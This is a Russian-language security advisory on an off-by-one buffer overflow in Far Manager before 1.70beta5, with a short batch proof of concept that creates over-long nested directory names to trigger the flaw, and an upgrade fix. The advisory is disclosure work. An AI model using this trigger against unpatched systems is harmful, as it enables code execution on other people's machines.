Переполнение буфера в Far Manager

Дата публикации:
12.02.2003
Дата изменения:
23.04.2007
Всего просмотров:
1011
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная
Воздействие:
Повышение привилегий
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
FAR Manager 1.70
Уязвимые версии: Far Manager версии до 1.70beta5.

Описание:
Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

Ошибка завышения на единицу обнаружена при обработке имен файлов. Удаленный пользователь может создать специально сформированное имя файла, длиной 160 символов и выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего приложение. Пример:

          @echo off 
          SET 
          A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
          AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
          SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
          mkdir \\?\c:\%A% 
          mkdir \\?\c:\%A%\%A% 
          mkdir \\?\c:\%A%\%B%\ 

URL производителя: www.rarlab.com/far_manager.htm

Решение: Установите последнюю версию (1.70beta5 или выше) с сайта производителя.

или введите имя

CAPTCHA